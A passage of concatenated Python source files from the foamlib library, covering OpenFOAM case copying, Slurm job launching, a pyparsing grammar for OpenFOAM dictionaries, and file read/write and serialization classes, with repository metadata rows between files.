pass
def copy(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Self:
"""
Make a copy of this case.
Use as a context manager to automatically delete the copy when done.
:param dst: The destination path. If None, clone to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._copy_calls(dst))
for _ in calls:
pass
return calls.value
def clone(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Self:
"""
Clone this case (make a clean copy).
Use as a context manager to automatically delete the clone when done.
:param dst: The destination path. If None, clone to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._clone_calls(dst))
for _ in calls:
pass
return calls.value
| 6,049 | Python | .py | 149 | 32.724832 | 181 | 0.618259 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,142 | _slurm.py | gerlero_foamlib/foamlib/_cases/_slurm.py | import shutil
import sys
from typing import TYPE_CHECKING, Any, Optional, Union
if sys.version_info >= (3, 9):
from collections.abc import Sequence
else:
from typing import Sequence
from ._async import AsyncFoamCase
from ._subprocess import run_async
if TYPE_CHECKING:
import os
class AsyncSlurmFoamCase(AsyncFoamCase):
"""An asynchronous OpenFOAM case that launches jobs on a Slurm cluster."""
@staticmethod
async def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
fallback: bool = False,
**kwargs: Any,
) -> None:
if fallback and shutil.which("salloc") is None:
await AsyncFoamCase._run(cmd, cpus=cpus, **kwargs)
return
if cpus >= 1:
if isinstance(cmd, str):
cmd = ["/bin/sh", "-c", cmd]
if cpus == 1:
cmd = ["srun", *cmd]
cmd = ["salloc", "-n", str(cpus), "--job-name", "foamlib", *cmd]
await run_async(cmd, **kwargs)
async def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
fallback: bool = False,
) -> None:
"""
Run this case, or a specified command in the context of this case.
:param cmd: The command to run. If None, run the case. If a sequence, the first element is the command and the rest are arguments. If a string, `cmd` is executed in a shell.
:param parallel: If True, run in parallel using MPI. If None, autodetect whether to run in parallel.
:param cpus: The number of CPUs to use. If None, autodetect according to the case. If 0, run locally.
:param check: If True, raise a CalledProcessError if any command returns a non-zero exit code.
:param log: If True, log the command output to a file.
:param fallback: If True, fall back to running the command locally if Slurm is not available.
"""
for coro in self._run_calls(
cmd=cmd,
parallel=parallel,
cpus=cpus,
check=check,
log=log,
fallback=fallback,
):
await coro
| 2,346 | Python | .py | 59 | 31.305085 | 181 | 0.604396 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,143 | _base.py | gerlero_foamlib/foamlib/_cases/_base.py | import shutil
import sys
from pathlib import Path
from typing import (
TYPE_CHECKING,
Optional,
Union,
overload,
)
if sys.version_info >= (3, 9):
from collections.abc import (
Iterator,
Sequence,
Set,
)
else:
from typing import AbstractSet as Set
from typing import (
Iterator,
Sequence,
)
from .._files import FoamFieldFile, FoamFile
if TYPE_CHECKING:
import os
class FoamCaseBase(Sequence["FoamCaseBase.TimeDirectory"]):
def __init__(self, path: Union["os.PathLike[str]", str] = Path()):
self.path = Path(path).absolute()
class TimeDirectory(Set[FoamFieldFile]):
"""
An OpenFOAM time directory in a case.
Use to access field files in the directory, e.g. `time["U"]`.
:param path: The path to the time directory.
"""
def __init__(self, path: Union["os.PathLike[str]", str]):
self.path = Path(path).absolute()
@property
def _case(self) -> "FoamCaseBase":
return FoamCaseBase(self.path.parent)
@property
def time(self) -> float:
"""The time that corresponds to this directory."""
return float(self.path.name)
@property
def name(self) -> str:
"""The name of this time directory."""
return self.path.name
def __getitem__(self, key: str) -> FoamFieldFile:
if (self.path / f"{key}.gz").is_file() and not (self.path / key).is_file():
return FoamFieldFile(self.path / f"{key}.gz")
return FoamFieldFile(self.path / key)
def __contains__(self, obj: object) -> bool:
if isinstance(obj, FoamFieldFile):
return obj.path.parent == self.path and obj.path.is_file()
if isinstance(obj, str):
return (self.path / obj).is_file() or (
self.path / f"{obj}.gz"
).is_file()
return False
def __iter__(self) -> Iterator[FoamFieldFile]:
for p in self.path.iterdir():
if p.is_file() and (
p.suffix != ".gz" or not p.with_suffix("").is_file()
):
yield FoamFieldFile(p)
def __len__(self) -> int:
return len(list(iter(self)))
def __delitem__(self, key: str) -> None:
if (self.path / f"{key}.gz").is_file() and not (self.path / key).is_file():
(self.path / f"{key}.gz").unlink()
else:
(self.path / key).unlink()
def __fspath__(self) -> str:
return str(self.path)
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self.path}')"
def __str__(self) -> str:
return str(self.path)
@property
def _times(self) -> Sequence["FoamCaseBase.TimeDirectory"]:
times = []
for p in self.path.iterdir():
if p.is_dir():
try:
float(p.name)
except ValueError:
pass
else:
times.append(FoamCaseBase.TimeDirectory(p))
times.sort(key=lambda t: t.time)
return times
@overload
def __getitem__(
self, index: Union[int, float, str]
) -> "FoamCaseBase.TimeDirectory": ...
@overload
def __getitem__(self, index: slice) -> Sequence["FoamCaseBase.TimeDirectory"]: ...
def __getitem__(
self, index: Union[int, slice, float, str]
) -> Union["FoamCaseBase.TimeDirectory", Sequence["FoamCaseBase.TimeDirectory"]]:
if isinstance(index, str):
return FoamCaseBase.TimeDirectory(self.path / index)
if isinstance(index, float):
for time in self._times:
if time.time == index:
return time
raise IndexError(f"Time {index} not found")
return self._times[index]
def __len__(self) -> int:
return len(self._times)
def __delitem__(self, key: Union[int, float, str]) -> None:
shutil.rmtree(self[key].path)
@property
def name(self) -> str:
"""The name of the case."""
return self.path.name
def file(self, path: Union["os.PathLike[str]", str]) -> FoamFile:
"""Return a FoamFile object for the given path in the case."""
return FoamFile(self.path / path)
@property
def _nsubdomains(self) -> Optional[int]:
"""Return the number of subdomains as set in the decomposeParDict, or None if no decomposeParDict is found."""
try:
nsubdomains = self.decompose_par_dict["numberOfSubdomains"]
if not isinstance(nsubdomains, int):
raise TypeError(
f"numberOfSubdomains in {self.decompose_par_dict} is not an integer"
)
return nsubdomains
except FileNotFoundError:
return None
@property
def _nprocessors(self) -> int:
"""Return the number of processor directories in the case."""
return len(list(self.path.glob("processor*")))
@property
def application(self) -> str:
"""The application name as set in the controlDict."""
application = self.control_dict["application"]
if not isinstance(application, str):
raise TypeError(f"application in {self.control_dict} is not a string")
return application
@property
def control_dict(self) -> FoamFile:
"""The controlDict file."""
return self.file("system/controlDict")
@property
def fv_schemes(self) -> FoamFile:
"""The fvSchemes file."""
return self.file("system/fvSchemes")
@property
def fv_solution(self) -> FoamFile:
"""The fvSolution file."""
return self.file("system/fvSolution")
@property
def decompose_par_dict(self) -> FoamFile:
"""The decomposeParDict file."""
return self.file("system/decomposeParDict")
@property
def block_mesh_dict(self) -> FoamFile:
"""The blockMeshDict file."""
return self.file("system/blockMeshDict")
@property
def transport_properties(self) -> FoamFile:
"""The transportProperties file."""
return self.file("constant/transportProperties")
@property
def turbulence_properties(self) -> FoamFile:
"""The turbulenceProperties file."""
return self.file("constant/turbulenceProperties")
def __fspath__(self) -> str:
return str(self.path)
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self.path}')"
def __str__(self) -> str:
return str(self.path)
| 6,733 | Python | .py | 175 | 29 | 118 | 0.576516 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,144 | _parsing.py | gerlero_foamlib/foamlib/_files/_parsing.py | import array
import sys
from typing import Tuple, Union, cast
if sys.version_info >= (3, 9):
from collections.abc import Iterator, Mapping, MutableMapping, Sequence
else:
from typing import Iterator, Mapping, MutableMapping, Sequence
if sys.version_info >= (3, 10):
from types import EllipsisType
else:
from typing import Any as EllipsisType
from pyparsing import (
CharsNotIn,
Combine,
Dict,
Forward,
Group,
Keyword,
LineEnd,
Literal,
Located,
Opt,
ParserElement,
ParseResults,
QuotedString,
Word,
c_style_comment,
common,
counted_array,
cpp_style_comment,
identchars,
printables,
)
from ._base import FoamFileBase
def _list_of(entry: ParserElement) -> ParserElement:
return Opt(
Literal("List") + Literal("<") + common.identifier + Literal(">")
).suppress() + (
(
counted_array(entry, common.integer + Literal("(").suppress())
+ Literal(")").suppress()
).set_parse_action(lambda tks: [tks.as_list()])
| (
Literal("(").suppress()
+ Group((entry)[...], aslist=True)
+ Literal(")").suppress()
)
| (
common.integer + Literal("{").suppress() + entry + Literal("}").suppress()
).set_parse_action(lambda tks: [[tks[1]] * tks[0]])
)
def _keyword_entry_of(
keyword: ParserElement,
data_entries: ParserElement,
*,
located: bool = False,
) -> ParserElement:
subdict = Forward()
keyword_entry = keyword + (
(Literal("{").suppress() + subdict + Literal("}").suppress())
| (data_entries + Literal(";").suppress())
)
if located:
keyword_entry = Located(keyword_entry)
subdict <<= Dict(Group(keyword_entry)[...], asdict=not located)
return keyword_entry
def _unpack_binary_field(
tks: ParseResults,
) -> Sequence[Union[Sequence[float], Sequence[Sequence[float]]]]:
elsize = len(tks[0]) // 8
arr = array.array("d", "".join(tks).encode("latin-1"))
all: Union[Sequence[float], Sequence[Sequence[float]]]
if elsize != 1:
all = [arr[i : i + elsize].tolist() for i in range(0, len(arr), elsize)]
else:
all = arr.tolist()
return [all]
_IDENTCHARS = identchars + "$"
_IDENTBODYCHARS = (
printables.replace(";", "")
.replace("{", "")
.replace("}", "")
.replace("[", "")
.replace("]", "")
)
_SWITCH = (
Keyword("yes", _IDENTBODYCHARS)
| Keyword("true", _IDENTBODYCHARS)
| Keyword("on", _IDENTBODYCHARS)
| Keyword("y", _IDENTBODYCHARS)
| Keyword("t", _IDENTBODYCHARS)
).set_parse_action(lambda: True) | (
Keyword("no", _IDENTBODYCHARS)
| Keyword("false", _IDENTBODYCHARS)
| Keyword("off", _IDENTBODYCHARS)
| Keyword("n", _IDENTBODYCHARS)
| Keyword("f", _IDENTBODYCHARS)
).set_parse_action(lambda: False)
_DIMENSIONS = (
Literal("[").suppress() + common.number[0, 7] + Literal("]").suppress()
).set_parse_action(lambda tks: FoamFileBase.DimensionSet(*tks))
_TENSOR = _list_of(common.number) | common.number
_IDENTIFIER = Combine(
Word(_IDENTCHARS, _IDENTBODYCHARS, exclude_chars="()")
+ Opt(Literal("(") + Word(_IDENTBODYCHARS, exclude_chars="()") + Literal(")"))
)
_DIMENSIONED = (Opt(_IDENTIFIER) + _DIMENSIONS + _TENSOR).set_parse_action(
lambda tks: FoamFileBase.Dimensioned(*reversed(tks.as_list()))
)
_FIELD = (Keyword("uniform").suppress() + _TENSOR) | (
Keyword("nonuniform").suppress()
+ (
_list_of(_TENSOR)
| (
Literal("List").suppress()
+ Literal("<").suppress()
+ (
counted_array(
CharsNotIn(exact=8),
Literal("scalar").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
| counted_array(
CharsNotIn(exact=8 * 3),
Literal("vector").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
| counted_array(
CharsNotIn(exact=8 * 6),
Literal("symmTensor").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
| counted_array(
CharsNotIn(exact=8 * 9),
Literal("tensor").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
)
+ Literal(")").suppress()
).set_parse_action(_unpack_binary_field)
)
)
_TOKEN = QuotedString('"', unquote_results=False) | _IDENTIFIER
_DATA = Forward()
_KEYWORD = _TOKEN | _list_of(_IDENTIFIER).set_parse_action(
lambda tks: "(" + " ".join(tks[0]) + ")"
)
_KEYWORD_ENTRY = Dict(Group(_keyword_entry_of(_KEYWORD, _DATA)), asdict=True)
_DATA_ENTRY = Forward()
_LIST_ENTRY = _KEYWORD_ENTRY | _DATA_ENTRY
_LIST = _list_of(_LIST_ENTRY)
_DATA_ENTRY <<= (
_FIELD | _LIST | _DIMENSIONED | _DIMENSIONS | common.number | _SWITCH | _TOKEN
)
_DATA <<= _DATA_ENTRY[1, ...].set_parse_action(
lambda tks: tuple(tks) if len(tks) > 1 else [tks[0]]
)
_FILE = (
Dict(
Group(_keyword_entry_of(_KEYWORD, Opt(_DATA, default=""), located=True))[...]
+ Opt(
Group(
Located(
_DATA_ENTRY[1, ...].set_parse_action(
lambda tks: [None, tuple(tks) if len(tks) > 1 else tks[0]]
)
)
)
)
+ Group(_keyword_entry_of(_KEYWORD, Opt(_DATA, default=""), located=True))[...]
)
.ignore(c_style_comment)
.ignore(cpp_style_comment)
.ignore(Literal("#include") + ... + LineEnd()) # type: ignore [no-untyped-call]
.parse_with_tabs()
)
class Parsed(Mapping[Tuple[str, ...], Union[FoamFileBase.Data, EllipsisType]]):
def __init__(self, contents: bytes) -> None:
self._parsed: MutableMapping[
Tuple[str, ...],
Tuple[int, Union[FoamFileBase.Data, EllipsisType], int],
] = {}
self._end = len(contents)
for parse_result in _FILE.parse_string(
contents.decode("latin-1"), parse_all=True
):
self._parsed.update(self._flatten_result(parse_result))
@staticmethod
def _flatten_result(
parse_result: ParseResults, *, _keywords: Tuple[str, ...] = ()
) -> Mapping[
Tuple[str, ...], Tuple[int, Union[FoamFileBase.Data, EllipsisType], int]
]:
ret: MutableMapping[
Tuple[str, ...],
Tuple[int, Union[FoamFileBase.Data, EllipsisType], int],
] = {}
start = parse_result.locn_start
assert isinstance(start, int)
item = parse_result.value
assert isinstance(item, Sequence)
end = parse_result.locn_end
assert isinstance(end, int)
keyword, *data = item
if keyword is None:
assert not _keywords
assert len(data) == 1
assert not isinstance(data[0], ParseResults)
ret[()] = (start, data[0], end)
else:
assert isinstance(keyword, str)
ret[(*_keywords, keyword)] = (start, ..., end)
for d in data:
if isinstance(d, ParseResults):
ret.update(
Parsed._flatten_result(d, _keywords=(*_keywords, keyword))
)
else:
ret[(*_keywords, keyword)] = (start, d, end)
return ret
def __getitem__(
self, keywords: Union[str, Tuple[str, ...]]
) -> Union[FoamFileBase.Data, EllipsisType]:
if isinstance(keywords, str):
keywords = (keywords,)
_, data, _ = self._parsed[keywords]
return data
def __contains__(self, keywords: object) -> bool:
return keywords in self._parsed
def __iter__(self) -> Iterator[Tuple[str, ...]]:
return iter(self._parsed)
def __len__(self) -> int:
return len(self._parsed)
def entry_location(
self, keywords: Tuple[str, ...], *, missing_ok: bool = False
) -> Tuple[int, int]:
try:
start, _, end = self._parsed[keywords]
except KeyError:
if missing_ok:
if len(keywords) > 1:
_, _, end = self._parsed[keywords[:-1]]
end -= 1
else:
end = self._end
start = end
else:
raise
return start, end
def as_dict(self) -> FoamFileBase._File:
ret: FoamFileBase._File = {}
for keywords, (_, data, _) in self._parsed.items():
r = ret
for k in keywords[:-1]:
v = r[k]
assert isinstance(v, dict)
r = cast(FoamFileBase._File, v)
assert isinstance(r, dict)
if keywords:
r[keywords[-1]] = {} if data is ... else data
else:
assert data is not ...
r[None] = data
return ret
| 9,394 | Python | .py | 272 | 25.5 | 87 | 0.536438 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,145 | _util.py | gerlero_foamlib/foamlib/_files/_util.py | import sys
from typing import Any
if sys.version_info >= (3, 9):
from collections.abc import Sequence
else:
from typing import Sequence
if sys.version_info >= (3, 10):
from typing import TypeGuard
else:
from typing_extensions import TypeGuard
def is_sequence(
value: Any,
) -> TypeGuard[Sequence[Any]]:
return isinstance(value, Sequence) and not isinstance(value, str)
| 397 | Python | .py | 14 | 25.357143 | 69 | 0.746702 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,146 | __init__.py | gerlero_foamlib/foamlib/_files/__init__.py | from ._base import FoamFileBase
from ._files import FoamFieldFile, FoamFile
__all__ = [
"FoamFile",
"FoamFieldFile",
"FoamFileBase",
]
| 148 | Python | .py | 7 | 18.285714 | 43 | 0.7 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,147 | _files.py | gerlero_foamlib/foamlib/_files/_files.py | import sys
from typing import TYPE_CHECKING, Any, Optional, Tuple, Union, cast
if sys.version_info >= (3, 8):
from typing import Literal
else:
from typing_extensions import Literal
if sys.version_info >= (3, 9):
from collections.abc import Iterator, Mapping, MutableMapping, Sequence
else:
from typing import Iterator, Mapping, MutableMapping, Sequence
from ._base import FoamFileBase
from ._io import FoamFileIO
from ._serialization import Kind, dumps
from ._util import is_sequence
if TYPE_CHECKING:
import numpy as np
class FoamFile(
FoamFileBase,
MutableMapping[
Optional[Union[str, Tuple[str, ...]]],
Union["FoamFile.Data", "FoamFile.SubDict"],
],
FoamFileIO,
):
"""
An OpenFOAM data file.
Use as a mutable mapping (i.e., like a dict) to access and modify entries.
Use as a context manager to make multiple changes to the file while saving all changes only once at the end.
"""
class SubDict(
MutableMapping[str, Union["FoamFile.Data", "FoamFile.SubDict"]],
):
"""An OpenFOAM dictionary within a file as a mutable mapping."""
def __init__(self, _file: "FoamFile", _keywords: Tuple[str, ...]) -> None:
self._file = _file
self._keywords = _keywords
def __getitem__(
self, keyword: str
) -> Union["FoamFile.Data", "FoamFile.SubDict"]:
return self._file[(*self._keywords, keyword)]
def __setitem__(
self,
keyword: str,
data: "FoamFile._SetData",
) -> None:
self._file[(*self._keywords, keyword)] = data
def __delitem__(self, keyword: str) -> None:
del self._file[(*self._keywords, keyword)]
def __iter__(self) -> Iterator[str]:
for k in self._file._iter(self._keywords):
assert k is not None
yield k
def __contains__(self, keyword: object) -> bool:
return (*self._keywords, keyword) in self._file
def __len__(self) -> int:
return len(list(iter(self)))
def update(self, *args: Any, **kwargs: Any) -> None:
with self._file:
super().update(*args, **kwargs)
def clear(self) -> None:
with self._file:
super().clear()
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self._file}', {self._keywords})"
def as_dict(self) -> FoamFileBase._Dict:
"""Return a nested dict representation of the dictionary."""
ret = self._file.as_dict(include_header=True)
for k in self._keywords:
assert isinstance(ret, dict)
v = ret[k]
assert isinstance(v, dict)
ret = cast(FoamFileBase._File, v)
return cast(FoamFileBase._Dict, ret)
@property
def version(self) -> float:
"""Alias of `self["FoamFile", "version"]`."""
ret = self["FoamFile", "version"]
if not isinstance(ret, float):
raise TypeError("version is not a float")
return ret
@version.setter
def version(self, value: float) -> None:
self["FoamFile", "version"] = value
@property
def format(self) -> Literal["ascii", "binary"]:
"""Alias of `self["FoamFile", "format"]`."""
ret = self["FoamFile", "format"]
if not isinstance(ret, str):
raise TypeError("format is not a string")
if ret not in ("ascii", "binary"):
raise ValueError("format is not 'ascii' or 'binary'")
return cast(Literal["ascii", "binary"], ret)
@format.setter
def format(self, value: Literal["ascii", "binary"]) -> None:
self["FoamFile", "format"] = value
@property
def class_(self) -> str:
"""Alias of `self["FoamFile", "class"]`."""
ret = self["FoamFile", "class"]
if not isinstance(ret, str):
raise TypeError("class is not a string")
return ret
@class_.setter
def class_(self, value: str) -> None:
self["FoamFile", "class"] = value
@property
def location(self) -> str:
"""Alias of `self["FoamFile", "location"]`."""
ret = self["FoamFile", "location"]
if not isinstance(ret, str):
raise TypeError("location is not a string")
return ret
@location.setter
def location(self, value: str) -> None:
self["FoamFile", "location"] = value
@property
def object_(self) -> str:
"""Alias of `self["FoamFile", "object"]`."""
ret = self["FoamFile", "object"]
if not isinstance(ret, str):
raise TypeError("object is not a string")
return ret
@object_.setter
def object_(self, value: str) -> None:
self["FoamFile", "object"] = value
def __getitem__(
self, keywords: Optional[Union[str, Tuple[str, ...]]]
) -> Union["FoamFile.Data", "FoamFile.SubDict"]:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
_, parsed = self._read()
value = parsed[keywords]
if value is ...:
return FoamFile.SubDict(self, keywords)
return value
def __setitem__(
self, keywords: Optional[Union[str, Tuple[str, ...]]], data: "FoamFile._SetData"
) -> None:
with self:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
try:
write_header = (
not self and "FoamFile" not in self and keywords != ("FoamFile",)
)
except FileNotFoundError:
write_header = keywords != ("FoamFile",)
if write_header:
self["FoamFile"] = {}
self.version = 2.0
self.format = "ascii"
self.class_ = "dictionary"
self.location = f'"{self.path.parent.name}"'
self.object_ = (
self.path.stem if self.path.suffix == ".gz" else self.path.name
)
kind = Kind.DEFAULT
if keywords == ("internalField",) or (
len(keywords) == 3
and keywords[0] == "boundaryField"
and (
keywords[2] in ("value", "gradient")
or keywords[2].endswith("Value")
or keywords[2].endswith("Gradient")
)
):
kind = Kind.BINARY_FIELD if self.format == "binary" else Kind.FIELD
elif keywords == ("dimensions",):
kind = Kind.DIMENSIONS
if (
kind == Kind.FIELD or kind == Kind.BINARY_FIELD
) and self.class_ == "dictionary":
if not is_sequence(data):
class_ = "volScalarField"
elif (len(data) == 3 and not is_sequence(data[0])) or len(data[0]) == 3:
class_ = "volVectorField"
elif (len(data) == 6 and not is_sequence(data[0])) or len(data[0]) == 6:
class_ = "volSymmTensorField"
elif (len(data) == 9 and not is_sequence(data[0])) or len(data[0]) == 9:
class_ = "volTensorField"
else:
class_ = "volScalarField"
self.class_ = class_
self[keywords] = data
else:
contents, parsed = self._read(missing_ok=True)
start, end = parsed.entry_location(keywords, missing_ok=True)
before = contents[:start].rstrip() + b"\n"
if len(keywords) <= 1:
before += b"\n"
after = contents[end:]
if after.startswith(b"}"):
after = b" " * (len(keywords) - 2) + after
if not after or after[:1] != b"\n":
after = b"\n" + after
if len(keywords) <= 1 and len(after) > 1 and after[:2] != b"\n\n":
after = b"\n" + after
indentation = b" " * (len(keywords) - 1)
if isinstance(data, Mapping):
if isinstance(data, (FoamFile, FoamFile.SubDict)):
data = data.as_dict()
self._write(
before
+ indentation
+ dumps(keywords[-1])
+ b"\n"
+ indentation
+ b"{\n"
+ indentation
+ b"}"
+ after
)
for k, v in data.items():
self[(*keywords, k)] = v
elif keywords:
self._write(
before
+ indentation
+ dumps(keywords[-1])
+ b" "
+ dumps(data, kind=kind)
+ b";"
+ after
)
else:
self._write(before + dumps(data, kind=kind) + after)
def __delitem__(self, keywords: Optional[Union[str, Tuple[str, ...]]]) -> None:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
contents, parsed = self._read()
start, end = parsed.entry_location(keywords)
self._write(contents[:start] + contents[end:])
def _iter(self, keywords: Tuple[str, ...] = ()) -> Iterator[Optional[str]]:
_, parsed = self._read()
yield from (k[-1] if k else None for k in parsed if k[:-1] == keywords)
def __iter__(self) -> Iterator[Optional[str]]:
yield from (k for k in self._iter() if k != "FoamFile")
def __contains__(self, keywords: object) -> bool:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
_, parsed = self._read()
return keywords in parsed
def __len__(self) -> int:
return len(list(iter(self)))
def update(self, *args: Any, **kwargs: Any) -> None:
with self:
super().update(*args, **kwargs)
def clear(self) -> None:
with self:
super().clear()
def __fspath__(self) -> str:
return str(self.path)
def as_dict(self, *, include_header: bool = False) -> FoamFileBase._File:
"""
Return a nested dict representation of the file.
:param include_header: Whether to include the "FoamFile" header in the output.
"""
_, parsed = self._read()
d = parsed.as_dict()
if not include_header:
d.pop("FoamFile", None)
return d
class FoamFieldFile(FoamFile):
"""An OpenFOAM dictionary file representing a field as a mutable mapping."""
class BoundariesSubDict(FoamFile.SubDict):
def __getitem__(self, keyword: str) -> "FoamFieldFile.BoundarySubDict":
value = super().__getitem__(keyword)
if not isinstance(value, FoamFieldFile.BoundarySubDict):
assert not isinstance(value, FoamFile.SubDict)
raise TypeError(f"boundary {keyword} is not a dictionary")
return value
class BoundarySubDict(FoamFile.SubDict):
"""An OpenFOAM dictionary representing a boundary condition as a mutable mapping."""
@property
def type(self) -> str:
"""Alias of `self["type"]`."""
ret = self["type"]
if not isinstance(ret, str):
raise TypeError("type is not a string")
return ret
@type.setter
def type(self, data: str) -> None:
self["type"] = data
@property
def value(
self,
) -> Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
]:
"""Alias of `self["value"]`."""
ret = self["value"]
if not isinstance(ret, (int, float, Sequence)):
raise TypeError("value is not a field")
return cast(
Union[
int, float, Sequence[Union[int, float, Sequence[Union[int, float]]]]
],
ret,
)
@value.setter
def value(
self,
value: Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
],
) -> None:
self["value"] = value
@value.deleter
def value(self) -> None:
del self["value"]
def __getitem__(
self, keywords: Optional[Union[str, Tuple[str, ...]]]
) -> Union[FoamFile.Data, FoamFile.SubDict]:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
ret = super().__getitem__(keywords)
if keywords[0] == "boundaryField" and isinstance(ret, FoamFile.SubDict):
if len(keywords) == 1:
ret = FoamFieldFile.BoundariesSubDict(self, keywords)
elif len(keywords) == 2:
ret = FoamFieldFile.BoundarySubDict(self, keywords)
return ret
@property
def dimensions(self) -> Union[FoamFile.DimensionSet, Sequence[Union[int, float]]]:
"""Alias of `self["dimensions"]`."""
ret = self["dimensions"]
if not isinstance(ret, FoamFile.DimensionSet):
raise TypeError("dimensions is not a DimensionSet")
return ret
@dimensions.setter
def dimensions(
self, value: Union[FoamFile.DimensionSet, Sequence[Union[int, float]]]
) -> None:
self["dimensions"] = value
@property
def internal_field(
self,
) -> Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
]:
"""Alias of `self["internalField"]`."""
ret = self["internalField"]
if not isinstance(ret, (int, float, Sequence)):
raise TypeError("internalField is not a field")
return cast(Union[int, float, Sequence[Union[int, float]]], ret)
@internal_field.setter
def internal_field(
self,
value: Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
],
) -> None:
self["internalField"] = value
@property
def boundary_field(self) -> "FoamFieldFile.BoundariesSubDict":
"""Alias of `self["boundaryField"]`."""
ret = self["boundaryField"]
if not isinstance(ret, FoamFieldFile.BoundariesSubDict):
assert not isinstance(ret, FoamFile.SubDict)
raise TypeError("boundaryField is not a dictionary")
return ret
@boundary_field.setter
def boundary_field(self, value: Mapping[str, FoamFile._Dict]) -> None:
self["boundaryField"] = value
| 16,025 | Python | .py | 394 | 28.941624 | 112 | 0.526597 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,148 | _serialization.py | gerlero_foamlib/foamlib/_files/_serialization.py | import array
import itertools
import sys
from enum import Enum, auto
if sys.version_info >= (3, 9):
from collections.abc import Mapping
else:
from typing import Mapping
from ._base import FoamFileBase
from ._util import is_sequence
try:
import numpy as np
numpy = True
except ModuleNotFoundError:
numpy = False
class Kind(Enum):
DEFAULT = auto()
SINGLE_ENTRY = auto()
FIELD = auto()
BINARY_FIELD = auto()
DIMENSIONS = auto()
def dumps(
data: FoamFileBase._SetData,
*,
kind: Kind = Kind.DEFAULT,
) -> bytes:
if numpy and isinstance(data, np.ndarray):
return dumps(data.tolist(), kind=kind)
if isinstance(data, Mapping):
entries = []
for k, v in data.items():
b = dumps(v, kind=kind)
if isinstance(v, Mapping):
entries.append(dumps(k) + b" {" + b + b"}")
elif not b:
entries.append(dumps(k) + b";")
else:
entries.append(dumps(k) + b" " + b + b";")
return b" ".join(entries)
if isinstance(data, FoamFileBase.DimensionSet) or (
kind == Kind.DIMENSIONS and is_sequence(data) and len(data) == 7
):
return b"[" + b" ".join(dumps(v) for v in data) + b"]"
if (kind == Kind.FIELD or kind == Kind.BINARY_FIELD) and (
isinstance(data, (int, float))
or is_sequence(data)
and data
and isinstance(data[0], (int, float))
and len(data) in (3, 6, 9)
):
return b"uniform " + dumps(data, kind=Kind.SINGLE_ENTRY)
if (kind == Kind.FIELD or kind == Kind.BINARY_FIELD) and is_sequence(data):
if isinstance(data[0], (int, float)):
tensor_kind = b"scalar"
elif len(data[0]) == 3:
tensor_kind = b"vector"
elif len(data[0]) == 6:
tensor_kind = b"symmTensor"
elif len(data[0]) == 9:
tensor_kind = b"tensor"
else:
return dumps(data)
if kind == Kind.BINARY_FIELD:
if tensor_kind == b"scalar":
contents = b"(" + array.array("d", data).tobytes() + b")"
else:
contents = (
b"("
+ array.array("d", itertools.chain.from_iterable(data)).tobytes()
+ b")"
)
else:
contents = dumps(data, kind=Kind.SINGLE_ENTRY)
return b"nonuniform List<" + tensor_kind + b"> " + dumps(len(data)) + contents
if kind != Kind.SINGLE_ENTRY and isinstance(data, tuple):
return b" ".join(dumps(v) for v in data)
if isinstance(data, FoamFileBase.Dimensioned):
if data.name is not None:
return (
dumps(data.name)
+ b" "
+ dumps(data.dimensions, kind=Kind.DIMENSIONS)
+ b" "
+ dumps(data.value, kind=Kind.SINGLE_ENTRY)
)
return (
dumps(data.dimensions, kind=Kind.DIMENSIONS)
+ b" "
+ dumps(data.value, kind=Kind.SINGLE_ENTRY)
)
if is_sequence(data):
